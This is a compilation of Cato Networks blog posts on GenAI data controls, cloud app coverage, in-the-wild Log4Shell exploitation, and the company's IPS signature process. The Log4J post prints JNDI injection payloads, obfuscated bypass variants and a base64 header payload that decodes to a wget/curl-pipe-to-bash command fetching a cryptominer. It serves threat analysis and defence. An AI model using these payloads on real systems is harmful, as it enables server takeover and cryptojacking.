Demystifying GenAI security, and how Cato helps you secure your organizations access to ChatGPT

Over the past year, countless articles, predictions, prophecies and premonitions have been written about the risks of AI, with GenAI (Generative AI) and ChatGPT being... Read ›
Demystifying GenAI security, and how Cato helps you secure your organizations access to ChatGPT Over the past year, countless articles, predictions, prophecies and premonitions have been written about the risks of AI, with GenAI (Generative AI) and ChatGPT being in the center. Ranging from its ethics to far reaching societal and workforce implications (“No Mom, The Terminator isn’t becoming a reality... for now”).Cato security research and engineering was so fascinated about the prognostications and worries that we decided to examine the risks to business posed by ChatGPT. What we found can be summarized into several key conclusions: There is presently more scaremongering than actual risk to organizations using ChatGPT and the likes. The benefits to productivity far outweigh the risks. Organizations should nonetheless be deploying security controls to keep their sensitive and proprietary information from being used in tools such as ChatGPT since the threat landscape can shift rapidly. Concerns explored A good deal of said scaremongering is around the privacy aspect of ChatGPT and the underlying GenAI technology.  The concern -- what exactly happens to the data being shared in ChatGPT; how is it used (or not used) to train the model in the background; how it is stored (if it is stored) and so on. The issue is the risk of data breaches and data leaks of company’s intellectual property when users interact with ChatGPT. Some typical scenarios being: Employees using ChatGPT – A user uploads proprietary or sensitive information to ChatGPT, such as a software engineer uploading a block of code to have it reviewed by the AI. Could this code later be leaked through replies (inadvertently or maliciously) in other accounts if the model uses that data to further train itself?Spoiler: Unlikely and no actual demonstration of systematic exploitation has been published. Data breaches of the service itself – What exposure does an organization using ChatGPT have if OpenAI is breached, or if user data is exposed through bugs in ChatGPT? Could sensitive information leak this way?Spoiler: Possibly, at least one public incident was reported by OpenAI in which some users saw chat titles of other users in their account due to a bug in OpenAI’s infrastructure. Proprietary GenAI implementations – AI already has its own dedicated MITRE framework of attacks, ATLAS, with techniques ranging from input manipulation to data exfiltration, data poisoning, inference attacks and so on. Could an organization's sensitive data be stolen though these methods?Spoiler: Yes, methods range from harmless, to theoretical all the way to practical, as showcased in a recent Cato Research post on the subject, in any case securing proprietary implementation of GenAI is outside the scope of this article. There’s always a risk in everything we do. Go onto the internet and there’s also a risk, but that doesn’t stop billions of users from doing it every day. One just needs to take the appropriate precautions. The same is true with ChatGPT.  While some scenarios are more likely than others, by looking at the problem from a practical point of view one can implement straightforward security controls for peace of mind. [boxlink link=""] Everything You Wanted To Know About AI Security But Were Afraid To Ask | Watch the Webinar [/boxlink] GenAI security controls In a modern SASE architecture, which includes CASB & DLP as part of the platform, these use-cases are easily addressable. Cato’s platform being exactly that, it offers a layered approach to securing usage of ChatGPT and similar applications inside the organization: Control which applications are allowed, and which users/groups are allowed to use those applications Control what text/data is allowed to be sent Enforcing application-specific options, e.g. opting-out of data retention, tenant control, etc. The initial approach is defining what AI applications are allowed and which user groups are allowed to use them, this can be done by a combination of using the “Generative AI Tools” application category with the specific tools to allow, e.g., blocking all GenAI tools and only allowing "OpenAI". A cornerstone of an advanced DLP solution is its ability to reliably classify data, and the legacy approaches of exact data matches, static rules and regular expressions are now all but obsolete when used on their own. For example, blocking a credit card number would be simple using a regular expression but in real-life scenarios involving financial documents there are many other means by which sensitive information can leak. It would be nearly pointless to try and keep up with changing data and fine-tuning policies without a more advanced solution that just works. Luckily, that is exactly where Cato’s ML (Machine Learning) Data Classifiers come in. This is the latest addition to Cato’s already expansive array of AI/ML capabilities integrated into the platform throughout the years. Our in-house LLM (Large Language Model), trained on millions of documents and data types, can natively identify documents in real-time, serving as the perfect tool for such policies.Let’s look at the scenario of blocking specific text input with ChatGPT, for example uploading confidential or sensitive data through the prompt. Say an employee from the legal department is drafting an NDA (non-disclosure agreement) document and before finalizing it gives it to ChatGPT to go over it and suggest improvement or even just go over the grammar. This could obviously be a violation of the company’s privacy policies, especially if the document contains PII. Figure 1 - Example rule to block upload of Legal documents, using ML Classifiers We can go deeper To further demonstrate the power and flexibility of a comprehensive CASB solution, let us examine an additional aspect of ChatGPT’s privacy controls. There is an option in the settings to disable “Chat history & training”, essentially letting the user decide that he does not want his data to be used for training the model and retained on OpenAI’s servers.This important privacy control is disabled by default, that is by default all chats ARE saved by OpenAI, aka users are opted-in, something an organization should avoid in any work-related activity with ChatGPT. Figure 2 - ChatGPT's data control configuration A good way to strike a balance between allowing users the flexibility to use ChatGPT but under stricter controls is only allowing chats in ChatGPT that have chat history disabled. Cato’s CASB granular ChatGPT application allows for this flexibility by being able to distinguish in real-time if a user is opted-in to chat history and block the connection before data is sent. Figure 3 – Example rule for “training opt-out” enforcement Lastly, as an alternative (or complementary) approach to the above, it is possible to configure Tenant Control for ChatGPT access, i.e., enforce which accounts are allowed when accessing the application. In a possible scenario an organization has corporate accounts in ChatGPT, where they have default security and data control policies enforced for all employees, and they would like to make sure employees do not access ChatGPT with their personal accounts on the free tier. Figure 4 - Example rule for tenant control To learn more about Cato’s CASB and DLP visit:

Busting the App Count Myth 

Many security vendors offer automated detection of cloud applications and services, classifying them into categories and exposing attributes such as security risk, compliance, company status... Read ›
Busting the App Count Myth  Many security vendors offer automated detection of cloud applications and services, classifying them into categories and exposing attributes such as security risk, compliance, company status etc. Users can then apply different security measures, including setting firewall, CASB and DLP policies, based on the apps categories and attributes.   It makes sense to conclude that the more apps are classified, the merrier. However, such a conclusion must be taken with a grain of salt. In this article, we’ll question this preconception, discuss alternatives for app counts and offer a more comprehensive approach for optimizing cloud application security.   Stop counting apps by the numbers, start considering application coverage  Discussing the number of apps classified by a security vendor is irrelevant without considering actual traffic. A vendor offering a catalog of 100K apps would be just as good as a vendor offering a catalog of 2K apps for clients whose organization accesses 1K apps that are all covered by both vendors.   Generalizing this statement, we should consider a Venn diagram:  The left circle represents the applications that are signed and classified by a security vendor, the right one represents the actual application traffic on the customer’s network. Their intersection represents the app coverage: the part of the app catalog that is applicable to the customer’s traffic.   Instead of focusing on app count in our catalog, like some vendors do, Cato focuses on maximizing the app coverage. The data and visibility we have as a cloud vendor allows our research teams to optimize the app coverage for the entire customer base, or, upon demand, to a certain customer category (e.g. geographical, business vertical etc.).  Coverage as a function of app count  Focusing on app coverage still raises the question: “if we sign more apps will the coverage increase?”. To understand the relationship between app count and the app coverage, we collected a week of traffic on the entire Cato cloud to observe classified vs. unclassified traffic, sorted the app and category classification in descending order by flow count, and then measured the contribution of the applications count on the total coverage.   To focus on scenarios of cloud application protection, which are the main market concern in terms of application catalog, our analysis is based on traffic of HTTP outbound flows collected from Cato’s data lake.   Our findings:   Figure 1: Application coverage as a function of number of apps, based on the Cato Cloud data-lake  From the plot above, you can see that:  10 applications cover 45.42% of the traffic  100 applications cover 81.6% of the traffic  1000 applications cover 95.58% of the traffic  2000 applications cover 96.41% of the traffic  4000 applications cover 96.72% of the traffic  9000 applications cover 96.78% of the traffic  It turns out that the last 5K apps added to Cato’s app catalog have contributed no more than 0.06% to our total coverage. The app count increase yielded diminishing returns in terms of app coverage.  The high 96.78% app coverage on the Cato cloud is a result of our systematic approach to classify apps that were seen on real customer traffic, prioritized by their contribution to the application coverage.   Going further than total Cato-cloud coverage, we’ve also examined the per-account coverage using a similar methodology. Our findings:  91% of our accounts get a 90% (or higher) app coverage   82% of our accounts get a 95% (or higher) app coverage  77% of our accounts get a 96% (or higher) app coverage  Since app coverage is just a function of the Cato coverage (unrelated to customer configuration), the conclusion is that if you’re a new Cato customer, there’s a 91% chance that 90% of your traffic will be classified. Taking it back to the Venn diagrams discussed above, this would look like:  App count is an easy measure to market. App coverage is where the real value is. Ask your vendor to tell you what percent of the application traffic they classify after they show off their shiny app catalog.   [boxlink link=""] How to Best Optimize Global Access to Cloud Applications | Download the eBook [/boxlink] The holy grail of 100% coverage  Is 100% application coverage possible? We took a deeper look at a week of traffic on the Cato cloud, focusing on traffic that is currently not classified into a Cato app or category. To get a sense of what it would take to classify it into apps, we classified this traffic by second-level domain (as opposed to full subdomain).   We found that 0.88% of the traffic doesn’t show any domain name (probably caused by direct IP access). The remaining part, which makes up 2.34% of the coverage, was spread across 3.18 million distinct second-level domains out of which 3.12 million were found on either less than 5 distinct client IPs or just a single Cato account.   This explains that there will always be an inherent long tail of unclassified traffic. At the vendor level, this makes meeting the “100% app coverage” unachievable.   Dealing with the unclassified  Classifying more and more apps to gain negligible coverage is just like fighting against windmills.   For both vendors and customers, we suggest that rather than chasing unclassified traffic, the long tail of unsigned apps needs to be handled with proper security mitigations. For example:  Malicious traffic: malicious traffic protection, such as communication with a CnC server, access to a phishing website, and drive-by malware delivery sites must not be affected by the lack of app classification. In Cato, Malware protection and IPS are independent from app classification, leaving customers protected even if the target site is not classified as a known app  Shadow IT apps: unauthorized access to non-sanctioned applications requires:   Full visibility: It’s good to keep visibility to all traffic, regardless of whether it’s classified or not. Cato users can choose to monitor any activity, whether the traffic is classified into an app / category or not  Data Loss Prevention: The use of unauthorized cloud storage or file-sharing services can lead to sensitive data leaking outside the organization. Cato has recently introduced the ability to DLP-scan all HTTP traffic, regardless of its app classification. Generally, it would be recommended to use this feature for setting more restrictive policies on unknown cloud services  Custom app detection: This feature introduces the ability to track traffic and classify it per customer, for improved tracking of applications that are unclassified by Cato  Conclusion  We have shown the futility of fixating on the number of apps in the app catalog as a measure of cloud app security strength. The diminishing return on growing app count challenges the prevailing notion that more is always better. Embracing a more meaningful measure, app coverage, emerges as a crucial pivot for assessing and optimizing cloud application security.  Effective security strategies must extend beyond app classification, acknowledging that full coverage is unfeasible. Risk must be mitigated using controls such as IPS and DLP to address the gap in covering g the app long tail and is a more feasible approach than the impossible hunt for 100% coverage.   In navigating the complex landscape of cloud application security, a nuanced approach that combines right metrics with the appropriate security controls becomes paramount for ensuring comprehensive and adaptive protection. 

Log4J – A Look into Threat Actors Exploitation Attempts

On December 9, a critical zero-day vulnerability was discovered in Apache Log4j, a very common Java logging tool. Exploiting this vulnerability allows attackers to take... Read ›
Log4J – A Look into Threat Actors Exploitation Attempts On December 9, a critical zero-day vulnerability was discovered in Apache Log4j, a very common Java logging tool. Exploiting this vulnerability allows attackers to take control over the affected servers, and this prompted a CVSS (Common Vulnerability Scoring System) severity level of 10. LogJam, also known as Log4Shell, is particularly dangerous because of its simplicity – forcing the application to write just one simple string allows attackers to upload their own malicious code to the application. To make things worse, working PoCs (Proof of Concept) are already available on the internet, making even inexperienced attackers a serious threat. Another reason this vulnerability is getting so much attention is the mass adoption of Log4j by many enterprises. Amazon, Steam, Twitter, Cisco, Tesla, and many others all make use of this library, which means different threat actors have a very wide range of targets from which to choose. As the old saying goes – not every system is vulnerable, not every vulnerability is exploitable and not every exploit is usable, but when all of these align Quick Mitigation At Cato, we were able to push mitigation in no-time, as well as have it deploy across our network, requiring no action whatsoever from customers with IPS enabled. The deployment was announced in our Knowledge Base together with technical details for customers. Moreover, we were able to set our detections based on traffic samples from the wild, thus minimizing the false positive rate from the very first signature deployment, and maximizing the protection span for different obfuscations and bypass techniques. Here are a couple of interesting exploit attempts we saw in the wild. These attempts are a good representation of an attack’s lifecycle and adoption by various threat actors, once such a vulnerability goes public. [boxlink link=""] Ransomware is on the rise | Download eBook [/boxlink] Exploit Trends and Anecdotes We found exploit attempts using the normal attack payload: ${jndi:ldap://<MALICIOUS DOMAIN>/Exploit}  We identified some interesting variations and trends: Adopted by Scanners Interestingly, we stumbled across scenarios of a single IP trying to send the malicious payload over a large variety of HTTP headers in a sequence of attempts: Access-Control-Request-Method: ${jndi:ldap://<REDACTED_IP>:42468/a} Access-Control-Request-Headers: ${jndi:ldap://<REDACTED_IP>:42468/a} Warning: ${jndi:ldap://<REDACTED_IP>:42468/a} Authorization: ${jndi:ldap://<REDACTED_IP>:42468/a} TE: ${jndi:ldap://<REDACTED_IP>:42468/a} Accept-Charset: ${jndi:ldap://<REDACTED_IP>:42468/a} Accept-Datetime: ${jndi:ldap://<REDACTED_IP>:42468/a} Date: ${jndi:ldap://<REDACTED_IP>:42468/a} Expect: ${jndi:ldap://<REDACTED_IP>:42468/a} Forwarded: ${jndi:ldap://<REDACTED_IP>:42468/a} From: ${jndi:ldap://<REDACTED_IP>:34467/a} X-Api-Version: ${jndi:ldap://<REDACTED_IP>:42468/a} Max-Forwards: ${jndi:ldap://<REDACTED_IP>:34467/a} Such behavior might be attributed to Qualys vulnerability scanner, which claimed to add a number of tests that attempt sending the Log4j vulnerability payloads across different HTTP headers. While it’s exciting to see the quick adoption of pentesting and scanning tools for this new vulnerability, one can’t help but wonder what would happen if these tools were used by malicious actors. Sinkholes Created nspecting attack traffic allowed us to find sinkhole addresses used for checking vulnerable devices. Sinkholes are internet-facing servers that collect traffic sent to them when a vulnerability PoC is found to be successful.   A bunch of HTTP requests with headers such as the ones below indicate the use of a sinkhole:  User-Agent: ${jndi:ldap://  User-Agent: ${jndi:ldap://}  We can tell that the sinkhole address matches the protocol and header on which the exploit attempt succeeds.   This header seen in the wild:  X-Api-Version: ${jndi:ldap://<REDACTED>  This is an example of using the burpcollaborator platform for sinkholing successful PoCs. In this case, the header used was an uncommon one, trying to bypass security products that might have overlooked it.   Among many sinkholes, we also noticed <string>, as mentioned here too.   Bypass Techniques Bypass techniques are described in a couple of different GitHub projects ([1], [2]). These bypass techniques mostly leverage syntactic flexibility to alter the payload to one that won’t trigger signatures that capture the traditional PoC example only. Some others alter the target scheme from the well-known ldap:// to rmi://, dns:// and ldaps:// A funny one we found in the wild is: GET /?x=${jndi:ldap://1.${hostName}.<REDACTED>} Host: <REDACTED_IP>:8080 User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://2.${hostName}.<REDACTED>}  Connection: close Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://3.${hostName}.<REDACTED>} Accept-Encoding: gzip  In this request, the attacker attempted three different attack methods: the regular one (in green), as well as two obfuscated ones (in purple and orange). Seems like they’ve assumed a target that would modify the request, replacing the malicious part of the payload with a sanitized version. However, they missed the fact that many modern security vendors would drop this request altogether, leaving them exposed to being signed and blocked by their “weakest link of obfuscation.”   Real Attacks – Cryptomining on the Back of Exploitation Victims While many of the techniques described above were used by pentesting tools and scanners to show a security risk, we also found true malicious actors attempting to leverage CVE-2021-44228 to drop malicious code on vulnerable servers. The attacks look like this:  Authorization: ff=${jndi:ldap://<REDACTED_IP>:1389/Basic/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTg1LjI1MC4xNDguMTU3OjgwMDUvYWNjfHxjdXJsIC1vIC0gaHR0cDovLzE4NS4yNTAuMTQ4LjE1Nzo4MDA1L2FjYyl8L2Jpbi9iYXNoIA==}  Base64-decoding the payload above reveals the attacker’s intentions:  …  (wget -O – http[:]//<REDACTED_IP>:8005/acc||curl -o – http[:]//<REDACTED_IP>:8005/acc)|/bin/bash  Downloading the file named acc leads to a bash code that downloads and runs XMrig cryptominer. Furthermore, before doing so it closes all existing instances of the miner and shuts them off if their CPU usage is too high to keep under the radar. Needless to say, the mined crypto coins make their way to the attacker’s wallet.   The SANS Honeypot Data API provides access to similar findings and variations of true attacks that target their honeypots.     The Apache Log4j vulnerability poses a great risk to enterprises that fail to mitigate it on time. As we described, the vulnerability was promptly used not only by legitimate scanners and pentesting tools, but by novice and advanced attackers, as well. Cato customers were well taken care of. We made sure the risk was promptly mitigated and notified our customers that their networks are safe. Read all about it in our  blog post: Cato Networks Rapid Response to The Apache Log4J Remote Code Execution Vulnerability. So until the next time....     

What Makes for a Great IPS: A Security Leader’s Perspective

A recent high severity Apache server vulnerability kicked off a frenzy of activity as security teams raced to patch their web servers. The path traversal... Read ›
What Makes for a Great IPS: A Security Leader’s Perspective A recent high severity Apache server vulnerability kicked off a frenzy of activity as security teams raced to patch their web servers. The path traversal vulnerability that can be used to map and leak files was already known to be exploited in the wild. Companies were urged to deploy the patch as quickly as possible. But Cato customers could rest easy. Like so many recent attacks and zero-day threats, Cato security engineers patched CVE-2021-41773 in under a week and, in this case, in just one day. What’s more the intrusion prevention system (IPS) patch generated zero false positives, which are all too common in an IPS. Here’s how we’re able to zero-day threats so quickly and effectively. Every IPS Must Be Kept Up-To-Date Let's step back for a moment. Every network needs the protection of an IPS. Network-based threats have become more widespread and an IPS is the right defensive mechanism to stop them. But traditionally, there have been so much overhead associated with an IPS that many companies failed to extract sufficient value from their IPS investments or just avoided deploying them in the first place. The increased use of encrypted traffic, makes TLS/SSL inspection essential. However, inspecting encrypted traffic degrades IPS performance. IPS inspection is also location bound and often does not extend to cloud and mobile traffic. Whenever a vulnerability notice is released, it’s a race of who acts first—the attackers or the IT organization. The IPS vendors may take days to issues a new signature. Even then the security team needs more time to first test the signature to see if it generates false positives before deploying it on live network. [boxlink link=""] Ransomware is on the Rise | Here's how we can help! [/boxlink] Cato Has a Fine-Tuned Process to Respond Quickly to Vulnerabilities The Cato SASE Cloud has an IPS-as-a-service that is fully integrated with our global network, bringing context-aware protection to users everywhere. Unlike on-premises IPS solutions, even users and resources outside of the office benefit from IPS protection. Cato engineers are also fully responsible for the maintenance of this critical component of our security offerings. Our processes and architecture enable incredible short time to remediate, like patching the above-mentioned Apache vulnerability in just one day. Other example response times to noted vulnerabilities include: Date Vulnerability Cato Response February 2021 VMWare VCenter RCE (CVE-2021-21972) 2 days March 2021 MS Exchange SSRF (CVE-2021-26855) 3 days March 2021 F5 Vulnerability (CVE-2021-22986) 2 days July 2021 PrintNightmare Spooler RCE Vulnerability (CVE-2021-1675) 3 days September 2021 VMware vCenter RCE (CVE-2021-22005) 1 day In the case of the VMware vCenter RCE vulnerability, an exploit was released in the wild and threat actors were known to be using it. This made it all the more critical to get the IPS patched quickly. Cato Delivers Security Value to Customers Cato eliminates the time needed to get the change management approved, schedule a maintenance window, and find resources to update the IPS by harnessing a machine learning algorithm, our massive data lake, and security expertise. The first step in the process is to automate collection of threat information. We use different sources for this information, creating a constant feed of threats for us to analyze. Among others, the main sources for threat information are: The National Vulnerability Database (NVD) published by NIST Social media, including tweets about CVEs that help us understand their importance Microsoft’s Active Protection Plan (MAPP), a monthly report of vulnerabilities in this company’s products, along with mitigation guidelines The next step is to apply smart filtering. Many CVEs and vulnerabilities might be out of Cato's IPS scope. This mainly includes threats that are locally exploited, or ones that won't generate any network traffic that passes through our points of presence (PoPs). Mainly based on the NVD classification, we’re able to tell in advance if they are out of scope, making sure that we don’t waste time on threats that are irrelevant to our secure access service edge (SASE) platform. Once we know which vulnerabilities we need to research, we assess their priorities using a couple of techniques. We measure social media traction using a proprietary machine learning service. Next, we estimate the risk of potential exploitations and the likelihood of the vulnerable product being installed at our customers’ premises. This latter step is based on Internet research, traffic samples, and simple common sense. On top of all the above steps, we run mechanisms to push-notify our team in case of a vulnerability hitting significant media traction on both mainstream cybersecurity media as well various hackers’ networks. We have found this to be a great indicator for the urgency of vulnerabilities. Time is Important but Accuracy is Critical Keeping an IPS up to date with timely threat information is important but accuracy of the signatures is even more so. Nobody wants to deal with multitudes of false positive alerts. Cato makes a concerted effort to reduce our false positive rate down to zero. Once a threat is analyzed and a signature is available, we run the following procedure: We reproduce an exploit, as well as possible variations of it, in a development environment so that we can thoroughly test the threat signature. We run a “what if” scenario on sample historical traffic from our data lake to understand what our signature should trigger once deployed to our PoPs. This is a very strong tool to save us the back-and-forth process of amending signatures that hit on legitimate traffic. Another benefit of this step is that we can test if an attack attempt has already happened. On-premises IPS vendors can’t do this last step. We deploy the signature to production in silent mode and monitor the signature’s hits to make sure it’s free of false positives. Once we are confident the signature is highly accurate, we move it into block mode. All told, this process takes between a couple of hours and a couple of weeks, based on the threat's priority. Cato Provides Other Advantages Too Cato's solution shifts the heavy security processing burden from an appliance to the cloud, all while eliminating performance issues and false positives. It’s worth mentioning again that all of the work to investigate vulnerabilities, create custom signatures to mitigate them, and deploy them across the entire network is all on Cato. Customers do not need to do a thing other than keep up with our latest security updates on the Release Notes to realize the benefits of an up-to-date and highly accurate IPS. To learn more about the features and benefits of Cato’s IPS service, read Cato Adds IPS as a Service with Context-Aware Protection to Cato SD-WAN.